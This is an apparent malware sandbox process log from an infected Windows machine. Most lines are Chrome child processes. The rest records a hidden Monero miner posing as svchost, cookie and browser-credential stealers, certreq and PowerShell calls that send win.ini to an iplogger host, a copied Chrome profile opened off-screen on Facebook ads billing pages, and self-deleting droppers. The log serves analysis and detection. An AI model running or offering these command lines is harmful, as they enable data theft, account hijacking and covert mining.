C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3756 /prefetch:820⤵PID:6988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4524 /prefetch:820⤵PID:800
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4424 /prefetch:820⤵PID:7112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4536 /prefetch:820⤵PID:7036
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4308 /prefetch:820⤵PID:6940
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:820⤵PID:5040
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3964 /prefetch:820⤵PID:5512
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4844 /prefetch:820⤵PID:6936
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3780 /prefetch:820⤵PID:4636
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4240 /prefetch:820⤵PID:5232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5696 /prefetch:820⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5724 /prefetch:820⤵PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5960 /prefetch:820⤵PID:6536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6116 /prefetch:820⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6228 /prefetch:820⤵PID:6628
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4528 /prefetch:820⤵PID:6640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4664 /prefetch:820⤵PID:6448
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6256 /prefetch:120⤵PID:7056
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4612 /prefetch:820⤵PID:6480
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6376 /prefetch:820⤵PID:7080
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6372 /prefetch:820⤵PID:5492
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6640 /prefetch:820⤵PID:5668
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6636 /prefetch:820⤵PID:6588
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6904 /prefetch:820⤵PID:4052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7044 /prefetch:820⤵PID:4564
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7208 /prefetch:120⤵PID:7032
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7372 /prefetch:820⤵PID:6552
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7688 /prefetch:820⤵PID:7060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4180 /prefetch:820⤵PID:660
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4236 /prefetch:820⤵PID:224
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5812 /prefetch:120⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4596 /prefetch:820⤵PID:7008
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5236 /prefetch:820⤵PID:6424
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7692 /prefetch:820⤵PID:7132
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5940 /prefetch:820⤵PID:4848
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5916 /prefetch:820⤵PID:6928
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=6344 /prefetch:820⤵PID:5524
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3380 /prefetch:820⤵PID:7108
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.15063.0 --gpu-preferences=MAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAIAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=7832 /prefetch:220⤵PID:3232
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7348 /prefetch:820⤵PID:6384
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=7504 /prefetch:820⤵PID:6276
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1772,2293239087017828739,2844030898401901233,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=4712 /prefetch:820⤵PID:5524
-
-
-
-
-
-
C:\Windows\regedit.exeregedit /s chrome-set.reg16⤵
- Runs .reg file with regedit
PID:6776
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b firefox16⤵PID:6560
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b chrome16⤵PID:6716
-
-
C:\Users\Admin\AppData\Local\Temp\RarSFX1\parse.exeparse.exe -f json -b edge16⤵PID:6448
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\DataFinder.exe"C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\DataFinder.exe" /Verysilent12⤵PID:4980
-
C:\Users\Admin\Services.exe"C:\Users\Admin\Services.exe"13⤵PID:6820
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -B --coin=monero --asm=auto --cpu-memory-pool=-1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-us-east1.nanopool.org:14433 --user=42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s --pass= --cpu-max-threads-hint=50 --donate-level=5 --unam-idle-wait=5 --unam-idle-cpu=0 --nicehash --tls --unam-stealth14⤵PID:6416
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\Delta.exe"C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\Delta.exe" /Verysilent12⤵PID:2808
-
C:\Users\Admin\AppData\Local\Temp\is-5PDDV.tmp\Delta.tmp"C:\Users\Admin\AppData\Local\Temp\is-5PDDV.tmp\Delta.tmp" /SL5="$E0382,898740,56832,C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\Delta.exe" /Verysilent13⤵PID:6684
-
C:\Users\Admin\AppData\Local\Temp\is-SPO3S.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-SPO3S.tmp\Setup.exe" /VERYSILENT14⤵PID:5800
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 100815⤵
- Program crash
PID:7044
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 101215⤵
- Program crash
PID:6976
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 109215⤵
- Program crash
PID:4064
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 114015⤵
- Program crash
PID:6564
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 121215⤵
- Program crash
PID:6484
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 134415⤵
- Program crash
PID:6824
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 131615⤵
- Program crash
PID:5660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 152015⤵
- Program crash
PID:6440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5800 -s 86415⤵
- Program crash
PID:6892
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\zznote.exe"C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\zznote.exe" /Verysilent12⤵PID:6660
-
C:\Users\Admin\AppData\Local\Temp\is-SNBKC.tmp\zznote.tmp"C:\Users\Admin\AppData\Local\Temp\is-SNBKC.tmp\zznote.tmp" /SL5="$F0382,138429,56832,C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\zznote.exe" /Verysilent13⤵PID:2056
-
C:\Users\Admin\AppData\Local\Temp\is-FGV95.tmp\jg4_4jaa.exe"C:\Users\Admin\AppData\Local\Temp\is-FGV95.tmp\jg4_4jaa.exe" /silent14⤵PID:4876
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\hjjgaa.exe"C:\Users\Admin\AppData\Local\Temp\is-SFN7H.tmp\hjjgaa.exe" /Verysilent12⤵PID:6540
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6592
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt13⤵PID:6752
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\o1ucph4rdgl\t0eii3wgus5.exe"C:\Users\Admin\AppData\Local\Temp\o1ucph4rdgl\t0eii3wgus5.exe" /ustwo INSTALL8⤵PID:3880
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 6529⤵
- Program crash
PID:1284
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 6649⤵
- Program crash
PID:1508
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 7689⤵
- Program crash
PID:2312
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 8049⤵
- Program crash
PID:5860
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 8729⤵
- Program crash
PID:4612
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 9209⤵
- Program crash
PID:664
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 11689⤵
- Program crash
PID:4440
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 12329⤵
- Program crash
PID:4596
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 12769⤵
- Program crash
PID:5252
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3880 -s 12569⤵
- Program crash
PID:836
-
-
-
C:\Users\Admin\AppData\Local\Temp\xfl43uqf4bc\chashepro3.exe"C:\Users\Admin\AppData\Local\Temp\xfl43uqf4bc\chashepro3.exe" /VERYSILENT8⤵PID:5576
-
C:\Users\Admin\AppData\Local\Temp\is-6TJOQ.tmp\chashepro3.tmp"C:\Users\Admin\AppData\Local\Temp\is-6TJOQ.tmp\chashepro3.tmp" /SL5="$3025A,1446038,58368,C:\Users\Admin\AppData\Local\Temp\xfl43uqf4bc\chashepro3.exe" /VERYSILENT9⤵PID:5788
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"C:\Program Files (x86)\JCleaner\whiterauf.exe"10⤵PID:5600
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"11⤵PID:4840
-
-
C:\Program Files (x86)\JCleaner\whiterauf.exe"{path}"11⤵PID:5440
-
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"C:\Program Files (x86)\JCleaner\Venita.exe"10⤵PID:4232
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:5580
-
-
C:\Program Files (x86)\JCleaner\Venita.exe"{path}"11⤵PID:1692
-
-
-
C:\Program Files (x86)\JCleaner\Abbas.exe"C:\Program Files (x86)\JCleaner\Abbas.exe"10⤵PID:6104
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" -command "Invoke-WebRequest -URI https://iplogger.org/1aSny7"10⤵PID:2524
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c "start https://iplogger.org/1aSny7"10⤵PID:5676
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c certreq -post -config https://iplogger.org/1aSny7 %windir%\\win.ini %temp%\\2 & del %temp%\\210⤵PID:1772
-
C:\Windows\SysWOW64\certreq.execertreq -post -config https://iplogger.org/1aSny7 C:\Windows\\win.ini C:\Users\Admin\AppData\Local\Temp\\211⤵PID:4120
-
-
-
C:\Program Files (x86)\JCleaner\5.exe"C:\Program Files (x86)\JCleaner\5.exe"10⤵PID:1560
-
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Program Files (x86)\JCleaner\5.exe"11⤵PID:1420
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK12⤵
- Delays execution with timeout.exe
PID:3972
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\y5u3v5r30rn\safebits.exe"C:\Users\Admin\AppData\Local\Temp\y5u3v5r30rn\safebits.exe" /S /pubid=1 /subid=4518⤵PID:6408
-
-
C:\Users\Admin\AppData\Local\Temp\4pwigoixmie\vict.exe"C:\Users\Admin\AppData\Local\Temp\4pwigoixmie\vict.exe" /VERYSILENT /id=5358⤵PID:2636
-
C:\Users\Admin\AppData\Local\Temp\is-117PK.tmp\vict.tmp"C:\Users\Admin\AppData\Local\Temp\is-117PK.tmp\vict.tmp" /SL5="$F0568,870426,780800,C:\Users\Admin\AppData\Local\Temp\4pwigoixmie\vict.exe" /VERYSILENT /id=5359⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\is-0LDQF.tmp\wimapi.exe"C:\Users\Admin\AppData\Local\Temp\is-0LDQF.tmp\wimapi.exe" 53510⤵PID:5740
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\uhw1zikidtq\askinstall24.exe"C:\Users\Admin\AppData\Local\Temp\uhw1zikidtq\askinstall24.exe"8⤵PID:5096
-
C:\Windows\SysWOW64\cmd.execmd.exe /c taskkill /f /im chrome.exe9⤵PID:3108
-
C:\Windows\SysWOW64\taskkill.exetaskkill /f /im chrome.exe10⤵
- Kills process with taskkill
PID:7260
-
-
-
C:\Windows\SysWOW64\xcopy.exexcopy "C:\Users\Admin\AppData\Local\Google\Chrome\User Data" "C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99\" /s /e /y9⤵PID:4708
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-50000,-50000 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" https://www.facebook.com/ https://www.facebook.com/pages/ https://secure.facebook.com/ads/manager/account_settings/account_billing/9⤵PID:6048
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --service-sandbox-type=network --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=1592 /prefetch:810⤵PID:68
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --mojo-platform-channel-handle=1628 /prefetch:210⤵PID:6148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --service-sandbox-type=utility --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --mojo-platform-channel-handle=2248 /prefetch:810⤵PID:6152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:110⤵PID:7412
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3096 /prefetch:110⤵PID:7220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:110⤵PID:6996
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2824 /prefetch:110⤵PID:7652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3596 /prefetch:110⤵PID:3388
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1616,8120926454926013171,15785413314382616998,131072 --disable-gpu-compositing --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Temp\gcfgjfgjaa99" --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3776 /prefetch:110⤵PID:6312
-
-
